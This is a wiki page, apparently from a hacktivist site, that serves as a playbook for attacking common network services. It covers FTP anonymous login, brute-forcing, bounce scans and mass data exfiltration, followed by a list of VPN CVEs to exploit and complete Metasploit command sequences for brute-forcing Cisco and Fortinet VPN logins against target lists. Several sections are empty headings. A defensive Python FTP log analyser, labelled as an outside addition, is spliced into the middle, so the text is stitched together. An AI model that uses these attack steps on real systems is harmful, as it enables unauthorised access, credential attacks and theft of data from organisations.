Common Service Attacks

From Enlace Hacktivista
Revision as of 20:35, 21 September 2023 by Booda (talk | contribs) (→‎VPN)

NOTE: This page is under construction

Services

The network services listed below commonly run on standard default ports. Although most of your targets (especially internal ones) will run services on the ports you would expect, it is important to also look for non-standard, high ports, since some sysadmins run their infrastructure under "Security Through Obscurity". To find these we can use third-party services such as Shodan and Censys, and port scanners such as nmap.

FTP

File Transfer Protocol (FTP) is commonly used to store and transfer files and runs on port 21 by default. A properly configured FTP server cannot be accessed unless it is vulnerable or uses weak credentials. However, if the server is misconfigured (for example, anonymous authentication is enabled) or weak credentials are in place, it can potentially be accessed. Once logged in, we can check whether we have write permissions, steal data, or upload a web shell to perform further post-exploitation and lateral movement.

Basic FTP authentication (CLI):

  • Basic FTP login: ftp 10.10.10.11 21
  • Feature rich (CLI) FTP client: ncftp -u admin -p Password123 10.10.10.11
  • A nice feature rich GUI FTP client: https://filezilla-project.org

Anonymous Login

A common security oversight and misconfiguration is an FTP server that allows anonymous login, and it becomes even better if we also have write permissions! To check for this misconfiguration you can either manually try to log in with anonymous:anonymous or use the nmap scripting engine to check automatically for you.

Check for FTP anonymous login:

  • ftp 10.10.10.11 (anonymous:anonymous)
  • sudo nmap -sC -sV 10.10.10.11 -p 21 -oA results

Brute-Force

Brute-force attacks stuff a login with thousands, hundreds of thousands or even millions of attempts from a password word list against a user or a list of users, guessing until the right password is found. If we can't get access to the FTP server using the anonymous login method, and assuming the sysadmin uses weak and guessable credentials, we may be able to brute-force the login and break our way in. Note that this is a very loud and proud method and is not recommended if you're trying to be stealthy.
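A defender-side complement to the anonymous-login and brute-force sections above, added here as an example and not part of the original page: a small Python script that parses vsftpd-style log lines (the line layout and all IP addresses are assumed, and the sample log is constructed) and flags sources with repeated failed logins inside a short window, plus any successful anonymous logins and uploads.

```python
import re
from collections import defaultdict
from datetime import datetime

# Matches vsftpd-style lines (layout assumed), e.g. Thu Sep 21 20:35:01 2023 [pid 1234] [admin] FAIL LOGIN: Client "10.10.10.5"
LINE_RE = re.compile(r'^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
                     r'\[(?P<user>[^\]]*)\] (?P<status>OK|FAIL) (?P<event>[A-Z]+): Client "(?P<ip>[^"]+)"')

# Constructed sample log: one source hammering a login, one anonymous session that logs in and uploads, one lone failure.
SAMPLE_LOG = [
    'Thu Sep 21 20:35:%02d 2023 [pid 1234] [admin] FAIL LOGIN: Client "10.10.10.5"' % s
    for s in range(1, 7)
] + [
    'Thu Sep 21 20:36:10 2023 [pid 1240] [anonymous] OK LOGIN: Client "10.10.10.7"',
    'Thu Sep 21 20:36:15 2023 [pid 1240] [anonymous] OK UPLOAD: Client "10.10.10.7", "/pub/incoming/x.php", 512 bytes, 1.00Kbyte/sec',
    'Thu Sep 21 20:37:00 2023 [pid 1250] [bob] FAIL LOGIN: Client "10.10.10.9"',
]

def parse_line(line):
    """Return a dict (ts, user, status, event, ip) for a recognised line, or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%a %b %d %H:%M:%S %Y")
    return rec

def analyse(lines, fail_threshold=5, window_seconds=60):
    """Flag password-guessing sources and anonymous activity in a log."""
    fails = defaultdict(list)  # source IP -> timestamps of recent failed logins
    findings = {"brute_force": set(), "anonymous_logins": [], "anonymous_uploads": []}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["event"] == "LOGIN" and rec["status"] == "FAIL":
            times = fails[rec["ip"]]
            times.append(rec["ts"])
            # drop failures that have fallen out of the sliding window
            while (times[-1] - times[0]).total_seconds() > window_seconds:
                times.pop(0)
            if len(times) >= fail_threshold:
                findings["brute_force"].add(rec["ip"])
        elif rec["user"] in ("anonymous", "ftp") and rec["status"] == "OK":
            if rec["event"] == "LOGIN":
                findings["anonymous_logins"].append(rec["ip"])
            elif rec["event"] == "UPLOAD":
                findings["anonymous_uploads"].append(rec["ip"])
    return findings
```

An anonymous upload is the write-permission case the section above calls out, so it is reported separately from a plain anonymous login.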

Brute-force using medusa and rockyou:

FTP Bounce

An FTP bounce attack is an old attack against FTP in which the target (hacked) server is effectively used as a proxy to reach other internal systems on the network from outside. We can use this method to port scan an internal network. Modern FTP servers disable this by default, but it is still worth checking for just in case your target is vulnerable to this attack.

nmap -Pn -v -n -p 80 -b anonymous:anonymous@10.10.10.11 <internal address>

Exfiltration

Once you find your way into an FTP server holding data that you want to exfiltrate en masse, you can use wget to mass exfiltrate all the data from the server to your own server.

Exfiltrate all data from the target server:

SSH

SMB

RDP

VPN

Virtual Private Networks (VPNs), in the corporate sense, are used to connect remotely into the corporation's internal network from anywhere outside it. This allows employees, IT staff, help desk and third parties to connect and access internal resources. We can abuse this trust relationship either by hacking the VPN through common, known vulnerabilities or by brute-forcing/password spraying for weak and guessable credentials on accounts that do not implement multi-factor authentication.

Vulnerabilities

There are many critical vulnerabilities affecting many different VPN products, and we can scan for and exploit them to gain initial access into the network. Here we list some (not all) critical VPN vulnerabilities that are worth scanning for and exploiting.

  1. CVE-2018-13379
  2. CVE-2019-11510
  3. CVE-2019-19781
  4. CVE-2021-20016
  5. CVE-2022-42475

Brute-Force

For this we can use two Metasploit modules for two very common corporate VPNs, one being Fortinet SSL VPN and the other being Cisco.

CISCO

sudo systemctl start postgresql
msfdb init

msfconsole
use auxiliary/scanner/http/cisco_ssl_vpn
set RHOSTS file:/home/targets_443.txt
set RPORT 443
set USER_FILE /home/users.txt
set PASS_FILE /home/pass.txt
set threads 10
run

Fortinet SSL VPN

sudo systemctl start postgresql
msfdb init

msfconsole
use auxiliary/scanner/http/fortinet_ssl_vpn
set RHOSTS file:/home/targets_10443.txt
set RPORT 10443
set USER_FILE /home/users.txt
set PASS_FILE /home/pass.txt
set threads 10
run

SQL

Email - SMTP

DNS